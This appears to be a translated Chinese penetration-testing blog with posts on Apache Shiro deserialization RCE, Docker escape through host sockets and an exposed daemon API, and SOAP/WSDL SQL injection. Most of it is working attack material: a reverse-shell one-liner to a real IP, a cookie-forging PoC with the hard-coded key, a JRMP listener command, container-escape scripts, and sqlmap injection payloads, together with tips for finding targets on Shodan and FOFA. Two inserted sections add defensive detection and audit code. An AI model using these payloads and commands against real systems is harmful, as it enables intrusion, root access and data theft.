From the brief description above we can identify the shiro framework, and we can go further and verify whether the shiro instance is vulnerable to deserialization: the Shiroscan script, open source on GitHub, is used; I won't elaborate on its usage.

python3 shiro_rce.py https://shiro.vuln.ip/login.html "ping x.dnslog.cn"
 ____  _     _          ____                  
/ ___|| |__ (_)_ __ ___/ ___|  ___ __ _ _ __  
\___ \| '_ \| | '__/ _ \___ \ / __/ _` | '_ \ 
 ___) | | | | | | | (_) |__) | (_| (_| | | | |
|____/|_| |_|_|_|  \___/____/ \___\__,_|_| |_|

                           By 斯文

Welcome To Shiro反序列化 RCE ! 
[*]  开始检测模块 Class1:CommonsBeanutils1

The script then generates cookies with the different keys, trying to make the machine run the command. While the script runs, or after it finishes, check the DNS records on dnslog; if records like the following exist, the deserialization vulnerability let the machine execute arbitrary code, otherwise it does not:

x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:46:35
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52
x.dnslog.cn    shiro.vuln.ip 2020-07-02 16:45:52

Not convinced

Of course, sometimes a shiroScan run ends with no records, i.e. no vulnerability; but someone like me doesn't give up, so I went rummaging online and found another detection script that brute-forces the key -_- author's blog

python shiro_exp.py https://shiro.vuln.ip/login.html
try CipherKey :4AvVhmFLUs0KTA3Kprsdag==
generator payload done.
send payload ok.
checking.....
checking.....
checking.....
checking.....
vulnerable:true url:https://shiro.vuln.ip/login.html    CipherKey:3AvVhmFLUs0KTA3Kprsdag==

The key also helps us understand shiro deserialization: the original source of shiro's deserialization vulnerability is precisely the hard-coded key.

getshell

With the steps above we can make a judgement on shiro deserialization and confirm that the RCE vulnerability exists, so on to our final goal, GET-shell. The usual reverse-shell command is bash -i >& /dev/tcp/47.52.233.92/11111 0>&1; it first has to be base64-encoded, because shiro only recognizes the command after base64 encoding and executes it after its own base64 decoding. Converted to base64 -> bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}; being lazy, I add the reverse shell directly in the script, with the advantage that we don't need to replace the cookie in the PoC-generating script: the cookies generated by the script are fired automatically, which saves a lot of effort. Source: a conversion website :-) Listen on the port and wait for the shell to connect back (my example here is a Docker environment)

nc -lvvp 11111
Listening on [0.0.0.0] (family 0, port 11111)
Connection from 59.110.152.168 47274 received!
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@6d5a7848dbef:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Study

Tools

Use ysoserial to listen for traffic; below is how the ysoserial jar is built, which anyone who knows development will understand.

git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn package -D skipTests

how-to-poc

Use the PoC code to obtain the corresponding rememberMe cookie value.

# -*- coding:utf-8 -*-
import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    # ysoserial writes the serialized JRMPClient payload to stdout
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    # PKCS#7 padding to a whole number of AES blocks
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")  # the hard-coded key mentioned above
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    # cookie value = base64(iv || AES-CBC ciphertext)
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print("rememberMe={0}".format(payload.decode()))

D:\bin4xin\code\shiro\shrio-poc\ysoserial\target> python .\shrio-poc.py 47.52.233.92:6666
rememberMe=W8BOhPe8Qdy8FJ5N9genqt4WjZaONr1NQ+dXgDCV1RrGHUwMfd8ljlA9AG64t7vzUesOp7YKsz6EFFHgyrq1qRqUiPFBnEBi/NNNpE2UR8CgMsf1KY2rbBurFv1Gwslv2+SL7hy3YNq9cpPWm5S8o+nJpa6IyI9cZ+n7a+6hjB4Yfnf89u3BLi4AxOXL35SotH2AdSX2iZrWgGAcah9oW21JwpC2zj4YMjsGf2tPYUysP873bYYHuSIohaXf3bcq4YuQajMctVmM3IvjeY5Ggva9QRUvo5B1o0sPNHdXGwn/z9t/KWcSeTWE+Dt2f95a9QjEIoic6s88Tv0SKjY6UdCmTxN3vVE8rs1haiA48R1CuUQQiWa9V28m2qkonX9aUEUl4kTGGvF+Y5eB4MaNTw==

Capture the traffic: intercept the front-end login, tick Remember Me, capture the request, then replace the cookie to build the request:

POST /doLogin HTTP/1.1
underattack-host: underattack-host:8080
Content-Length: 55
Cache-Control: max-age=0
Origin: http://underattack-host:8080
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://underattack-host:8080/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: rememberMe=RFUadguvSoq4kMm3ZwnkO/MHiokCrqrCURXUqUWaXLBM7/fBF65qvjWDFZeh49zHDRm5oKPU1AhmbEBaYRp3ASrQpHdp7mYrChOi51tmq9qkzWemDnjbUXtp8B6RF1EUNV2q2tKaKlf4AAR1hZIRJGbz4CpLeumNAeWB98f6/T0GaWJGGve9rP6l9/7iU5Y9Xj4ZmSBP6LgMHYF3TJ2DDdTNI4nPITeQI3S+9ol/BmT14Be5m0ENfOkm1cdm3L8Rj/pbeE842Y3nUioEdAXizCrOsCYT+u2QTWHt1YZLmB/xsfQvEV5bRpRJeRv/ps7V00PiXvCeaPQoDs541wqB75+/RRAdqU8TWnJE7YhvQVkxTRLvCjBTtwfkgA3XVA8X+518nh0wSoj8/Ajaoi5MbA==
Connection: close

username=asdmnin&password=asdasd&rememberme=remember-me

Use the jar to listen on port 6666:

root@iZj6cgn7odv59wmjjhe6zwZ:/home/tool/shiro_poc/POC-2/ysoserial/target# java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny41Mi4yMzMuOTIvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}'
* Opening JRMP listener on 6666

Send the request; we can see traffic flowing back to the JRMP listener port, as follows:

Have connection from /underattack-host:58272
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection
Have connection from /underattack-host:58274
Reading message...
Is DGC call for [[0:0:0, 356978429], [0:0:0, -1104978848], [0:0:0, 2006635131]]
Sending return with payload for obj [0:0:0, 2]
Closing connection

That's all.
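An added detection example, not part of the original post: a Python script (standard library only) that scans a constructed log for the trace the key-scanning scripts above leave behind, namely one source presenting many different rememberMe values within a short window, and applies a structural check derived from the cookie layout in the PoC (base64 of a 16-byte IV followed by block-aligned AES-CBC ciphertext). The log format, IP addresses and cookie values are all constructed.

```python
import base64
import binascii
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta

AES_BLOCK = 16  # rememberMe = base64(iv || AES-CBC ciphertext), both block-aligned


def rememberme_is_well_formed(value: str) -> bool:
    """Structural check only: a Shiro-shaped cookie decodes to at least an IV
    block plus one ciphertext block, with a block-aligned total length."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (ValueError, binascii.Error):
        return False
    return len(raw) >= 2 * AES_BLOCK and len(raw) % AES_BLOCK == 0


def parse_line(line: str):
    """Split one constructed log line: '<iso timestamp> <src ip> rememberMe=<value>'."""
    ts, src, rest = line.split(" ", 2)
    cookie = rest.split("rememberMe=", 1)[1].split(";", 1)[0].strip()
    return datetime.fromisoformat(ts), src, cookie


def find_key_bruteforce(lines, window=timedelta(seconds=60), threshold=5) -> dict:
    """Return {src_ip: distinct cookie count} for every source that presented more
    than `threshold` different rememberMe values inside a single `window`.
    A real client re-sends one cookie; a key scanner sends a new one per key."""
    events = defaultdict(list)
    for line in lines:
        if "rememberMe=" in line:
            ts, src, cookie = parse_line(line)
            events[src].append((ts, cookie))
    flagged = {}
    for src, evs in events.items():
        evs.sort()
        for i, (start, _) in enumerate(evs):
            distinct = {c for t, c in evs[i:] if t - start <= window}
            if len(distinct) > threshold:
                flagged[src] = max(flagged.get(src, 0), len(distinct))
    return flagged


def find_malformed(lines) -> list:
    """Sources that sent a rememberMe value which cannot be Shiro's own output."""
    bad = set()
    for line in lines:
        if "rememberMe=" in line:
            _, src, cookie = parse_line(line)
            if not rememberme_is_well_formed(cookie):
                bad.add(src)
    return sorted(bad)


def _fake_cookie(seed: str, blocks: int = 3) -> str:
    """Constructed, deterministic value shaped like a Shiro cookie (no real key involved)."""
    raw = b"".join(hashlib.md5(f"{seed}:{i}".encode()).digest() for i in range(blocks))
    return base64.b64encode(raw).decode()


# Constructed sample log (not from the post). Real access logs rarely record
# cookies, so this assumes a log format that does.
SAMPLE_LOG = (
    # 10.0.0.5 presents six different cookies within 15 seconds: scanner pattern
    [f"2020-07-02T16:45:{30 + 3 * i:02d} 10.0.0.5 rememberMe={_fake_cookie(f'key{i}')}"
     for i in range(6)]
    # 10.0.0.9 re-presents a single cookie: normal "remember me" behaviour
    + [f"2020-07-02T16:46:{10 + i:02d} 10.0.0.9 rememberMe={_fake_cookie('user')}"
       for i in range(3)]
    # 10.0.0.7 sends something that is not even block-aligned base64
    + ["2020-07-02T16:47:00 10.0.0.7 rememberMe=notbase64!!"]
)

if __name__ == "__main__":
    print("possible key brute-force:", find_key_bruteforce(SAMPLE_LOG))
    print("malformed cookies from:", find_malformed(SAMPLE_LOG))
```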


「DOCKER」: A few words on Docker escapes

May 17, 2020. | By: Bin4xin

Google Cloud Shell Docker escape

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
Welcome to Cloud Shell! Type "help" to get started.
Your Cloud Platform project in this session is set to avid-rope-267508.
Use “gcloud config set project [PROJECT_ID]” to change to a different project.
chihou_pro@cloudshell:~ (avid-rope-267508)$ sudo su
root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# ls
README-cloudshell.txt

It is immediately obvious that we are inside a Docker container (reference)

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# cat /proc/1/cgroup
12:hugetlb:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
11:perf_event:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
10:cpu,cpuacct:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
9:cpuset:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
8:memory:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
7:devices:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
6:freezer:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
5:blkio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
4:rdma:/
3:pids:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
2:net_cls,net_prio:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
1:name=systemd:/kubepods/besteffort/pod9621f4ca5c9abb70e26317dc85781dd7/2a5c07b1452692a636285fe36c44da49fe7f0afd48070c1d7f73a27138c5ad2b
0::/system.slice/containerd.service

Finding Docker

We can see keywords such as kubepods. After browsing the file system, we notice that two Docker unix sockets are available. The first is /run/docker.sock, the default path for the Docker client that runs inside Cloud Shell.

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# cat run/
docker/         docker.sock     google/         metrics/        postgresql/     sshd/           supervisor.pid  xtables.lock
docker.pid      docker-ssd.pid  lock/           mount/          rsyslogd.pid    sshd.pid        utmp

The second is the /google/host/var/run/docker.sock socket.

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/# ls /google/host/var/run/
agetty.reload  cloud-init        command-recorder  crash_reporter  docker      dockershim.sock  initctl  lockbox  lvm         metrics  sshd.pid  systemd  tmpfiles.d  user  vm
blkid          cloudshell-creds  containerd        dbus            docker.pid  docker.sock      lock     log      machine-id  mount    sudo      theia    udev        utmp  xtables.lock

Then, using the exploitable socket found above, write a bash script to escape the Docker container in Google Cloud Shell :-)

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name LiveOverflow-container -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start LiveOverflow-container
sudo docker -H unix:///google/host/var/run/docker.sock exec -it LiveOverflow-container /bin/sh

Run the bash script

root@cs-6000-devshell-vm-d336a485-4d57-485b-bd84-220ac5dd5619:/home/chihou_pro# bash docker_escape.sh
latest: Pulling from library/alpine
Digest: sha256:39eda93d15866957feaee28f8fc5adb545276a64147445c64992ef69804dbf01
Status: Image is up to date for alpine:latest
docker.io/library/alpine:latest
docker: Error response from daemon: Conflict. The container name "/LiveOverflow-container" is already in use by container "2e2896994c459d7be0a6acb613c8be509ef5158cb97ddac4b5e30b2fed770d56". You have to remove (or rename) that container to be able to reuse that name.
See 'docker run --help'.
LiveOverflow-container
/ # whoami
root

As shown above, the escape succeeded.

Reproducing the Docker daemon API vulnerability

Verifying that the vulnerability exists:

[root@iZ2ze9ebgot9gy5c2mi5ecZ unauthorized-rce]# curl http://vuln_docker_ip:2375/info
{"ID":"OY55:HR25:LKHP:XTLU:LCID:Y64D:46WQ:4T5U:U2SF:5PVW:R7I3:T6KV","Containers":2,"ContainersRunning":1,"ContainersPaused":0,"ContainersStopped":1,"Images":1,"Driver":"overlay2","DriverStatus":[["Backing Filesystem","extfs"],["Supports d_type","true"],["Native Overlay Diff","true"]],"SystemStatus":null,"Plugins":{"Volume":["local"],"Network":["bridge","host","macvlan","null","overlay"],"Authorization":null,"Log":["awslogs","fluentd","gcplogs","gelf","journald","json-file","logentries","splunk","syslog"]},"MemoryLimit":true,"SwapLimit":true,"KernelMemory":true,"CpuCfsPeriod":true,"CpuCfsQuota":true,"CPUShares":true,"CPUSet":true,"IPv4Forwarding":true,"BridgeNfIptables":false,"BridgeNfIp6tables":false,"Debug":false,"NFd":29,"OomKillDisable":true,"NGoroutines":51,"SystemTime":"2020-05-22T02:44:08.778253143Z","LoggingDriver":"json-file","CgroupDriver":"cgroupfs","NEventsListener":0,"KernelVersion":"3.10.0-1062.12.1.el7.x86_64","OperatingSystem":"Alpine Linux v3.7 (containerized)","OSType":"linux","Architecture":"x86_64","IndexServerAddress":"https://index.docker.io/v1/","RegistryConfig":{"AllowNondistributableArtifactsCIDRs":[],"AllowNondistributableArtifactsHostnames":[],"InsecureRegistryCIDRs":["127.0.0.0/8"],"IndexConfigs":{"docker.io":{"Name":"docker.io","Mirrors":[],"Secure":true,"Official":true}},"Mirrors":[]},"NCPU":2,"MemTotal":3973296128,"GenericResources":null,"DockerRootDir":"/var/lib/docker","HttpProxy":"","HttpsProxy":"","NoProxy":"","Name":"14e1a228e781","Labels":[],"ExperimentalBuild":false,"ServerVersion":"18.03.0-ce","ClusterStore":"","ClusterAdvertise":"","Runtimes":{"runc":{"path":"docker-runc"}},"DefaultRuntime":"runc","Swarm":{"NodeID":"","NodeAddr":"","LocalNodeState":"inactive","ControlAvailable":false,"Error":"","RemoteManagers":null},"LiveRestoreEnabled":false,"Isolation":"","InitBinary":"docker-init","ContainerdCommit":{"ID":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c","Expected":"cfd04396dc68220d1cecbe686a6cc3aa5ce3667c"},"RuncCommit":{"ID":"4fc53a81fb7c994640722ac585fa9ca548971871","Expected":"4fc53a81fb7c994640722ac585fa9ca548971871"},"InitCommit":{"ID":"949e6fa","Expected":"949e6fa"},"SecurityOptions":["name=seccomp,profile=default"]}

As above, requesting the info endpoint returns information about the Docker daemon. Run the command directly from the attacker machine:

root@shell:/home/tool/docker/unauth_rce# docker -H=tcp://vuln_docker_ip:2375 run -it -v /:/tmp --entrypoint /bin/sh alpine:latest
/ # whoami
root
/ # uname -a
Linux aa5ae15c12f0 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64 Linux
/ # ifconfig
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:656 (656.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

Shocking, isn't it? We can reproduce this on a practice range; these days it is rare to find a vulnerability of this severity on Shodan or FOFA. Check the Docker information on the host:

[root@shell unauthorized-rce]# bash /home/docker_shell_exe.sh
docker0   Link encap:Ethernet  HWaddr 02:42:ED:E8:4E:97
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:edff:fee8:4e97/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:266 (266.0 B)

eth0      Link encap:Ethernet  HWaddr 02:42:AC:14:00:02
          inet addr:172.20.0.2  Bcast:0.0.0.0  Mask:255.255.0.0
          inet6 addr: fe80::42:acff:fe14:2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45363 errors:0 dropped:0 overruns:0 frame:0
          TX packets:41902 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:10257217 (9.7 MiB)  TX bytes:3704534 (3.5 MiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:55 errors:0 dropped:0 overruns:0 frame:0
          TX packets:55 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6487 (6.3 KiB)  TX bytes:6487 (6.3 KiB)

The information returned above matches the target machine we used;
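An added audit example, not part of the original post: a Python policy check covering the two misconfigurations this post abuses, a container started with the flags of the escape script above (privileged, all capabilities, host network, bind-mounts of /, /proc, /sys or a Docker socket) and a daemon whose API is published on a TCP port without tlsverify (the unauthenticated 2375 case). It takes the dict shapes of `docker inspect`'s HostConfig and of /etc/docker/daemon.json; the sample specs are constructed, not captured from any system.

```python
# Sources that, bind-mounted into a container, hand it the host's control plane.
DANGEROUS_MOUNT_SOURCES = {"/", "/proc", "/sys", "/var/run/docker.sock", "/run/docker.sock"}


def audit_host_config(host_config: dict) -> list:
    """Return policy violations for one container, given the dict that
    `docker inspect` reports under "HostConfig" (or an equivalent run spec)."""
    findings = []
    if host_config.get("Privileged"):
        findings.append("privileged")
    if any(cap.upper() == "ALL" for cap in host_config.get("CapAdd") or []):
        findings.append("cap_add_all")
    if host_config.get("NetworkMode") == "host":
        findings.append("host_network")
    if host_config.get("PidMode") == "host":
        findings.append("host_pid")
    for bind in host_config.get("Binds") or []:
        src = bind.split(":", 1)[0]          # "host_path:container_path[:opts]"
        normalized = src if src == "/" else src.rstrip("/")
        if normalized in DANGEROUS_MOUNT_SOURCES or normalized.endswith("docker.sock"):
            findings.append(f"bind_mount:{src}")
    return findings


def audit_daemon_hosts(daemon_json: dict) -> list:
    """Flag daemon API listeners in a /etc/docker/daemon.json dict: a tcp://
    listener without tlsverify is the unauthenticated :2375 case above."""
    findings = []
    tls_verify = bool(daemon_json.get("tlsverify"))
    for host in daemon_json.get("hosts") or []:
        if not host.startswith("tcp://"):
            continue                          # unix:// and fd:// sockets are local
        if not tls_verify:
            findings.append(f"unauthenticated_tcp:{host}")
        elif host.startswith(("tcp://0.0.0.0", "tcp://[::]")):
            findings.append(f"tls_tcp_on_all_interfaces:{host}")
    return findings


# Constructed specs (not captured from any system), modelled on the commands above.
ESCAPE_CONTAINER = {   # -v /proc -v /sys -v / --network=host --privileged --cap-add=ALL
    "Privileged": True,
    "CapAdd": ["ALL"],
    "NetworkMode": "host",
    "Binds": ["/proc:/host/proc", "/sys:/host/sys", "/:/rootfs"],
}
UNAUTH_RCE_CONTAINER = {"Binds": ["/:/tmp"]}   # the "run -v /:/tmp" step above
SOCKET_CONTAINER = {"Binds": ["/google/host/var/run/docker.sock:/var/run/docker.sock"]}
HARDENED_CONTAINER = {"Privileged": False, "CapDrop": ["ALL"], "Binds": ["app-data:/data"]}
OPEN_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
TLS_DAEMON = {"hosts": ["tcp://0.0.0.0:2376"], "tlsverify": True,
              "tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem",
              "tlskey": "/etc/docker/server-key.pem"}

if __name__ == "__main__":
    for name, spec in [("escape", ESCAPE_CONTAINER), ("unauth-rce", UNAUTH_RCE_CONTAINER),
                       ("socket", SOCKET_CONTAINER), ("hardened", HARDENED_CONTAINER)]:
        print(name, audit_host_config(spec))
    print("open daemon", audit_daemon_hosts(OPEN_DAEMON))
    print("tls daemon", audit_daemon_hosts(TLS_DAEMON))
```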


「Pentest」: A new SQL injection trick :)

May 15, 2020. | By: Bin4xin

By some coincidence I came across a new way to do SQL injection, so I'm recording it here;

This is just a simple practice write-up, and I found it really interesting;

Target identification

Search for asmx on Shodan and FOFA to find sites that look susceptible to WSDL injection; they look roughly like http://vuln_ip:8081/WebService1.asmx?WSDL, and generally we can try the injection by hand. Opening such a site shows an XML-like document listing the parameters used to talk to the server, such as the username and passwd parameters of a login page, all configured by the developers. Below is the XML tag for one parameter:

<s:element name="HelloWorldResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="HelloWorldResult" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>

One-shot with sqlmap

WSDL injection

The manual approach is to build a SOAP POST request carrying the corresponding parameter and send it to the asmx page. The POST body looks like this:

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:HelloWorldResult>
           <urn:ins>1*</urn:ins>
        </urn:HelloWorldResult>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

That is the general idea of building the request; then observe how the server's database responds with errors. We can simply hand the POST request to sqlmap:

root@#:/home/tool/sqlmap-data/wsdl-inject# sqlmap -r net-test1.txt --batch
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.4#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end 
user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not 
responsible for any misuse or damage caused by this program

[*] starting at 11:03:20

[11:03:54] [INFO] testing Microsoft SQL Server
[11:03:54] [INFO] confirming Microsoft SQL Server
[11:04:24] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[11:04:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[11:04:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 19 times
[11:04:24] [INFO] fetched data logged to text files under '/root/.sqlmap/output/underattack-host'

[*] shutting down at 11:04:24

The injection payloads, listed separately:

---
Parameter: SOAP #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:getcode>
           <urn:ins>1' AND 1597 IN (SELECT (CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1597=1597) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'DZUD'='DZUD</urn:ins>
        </urn:getcode>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"  xmlns:xsd="http://www.w3.org/1999/XMLSchema"  xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance"  xmlns:m0="http://tempuri.org/"  xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://tempuri.org/">
     <SOAP-ENV:Header/>
     <SOAP-ENV:Body>
        <urn:getcode>
           <urn:ins>1' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(72)+CHAR(117)+CHAR(78)+CHAR(90)+CHAR(84)+CHAR(69)+CHAR(80)+CHAR(98)+CHAR(85)+CHAR(102)+CHAR(80)+CHAR(86)+CHAR(81)+CHAR(73)+CHAR(83)+CHAR(102)+CHAR(106)+CHAR(101)+CHAR(70)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(68)+CHAR(86)+CHAR(76)+CHAR(84)+CHAR(73)+CHAR(122)+CHAR(99)+CHAR(66)+CHAR(82)+CHAR(119)+CHAR(66)+CHAR(78)+CHAR(75)+CHAR(98)+CHAR(102)+CHAR(107)+CHAR(99)+CHAR(88)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- aKgd</urn:ins>
        </urn:getcode>
     </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
---

We can take a shortcut and just send the payloads to see how the responses differ~ can you spot the difference?

Type: error-based injection:
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 459

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request.---&gt;在将 varchar 值 'qpbzq1qzkxq' 转换成数据类型</faultstring><detail/></soap:Fault></soap:Body></soap:Envelope>
=======================================================================================
=======================================================================================
Type: UNION query; the output is lengthy, so for space only some of the data is shown:

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 20111

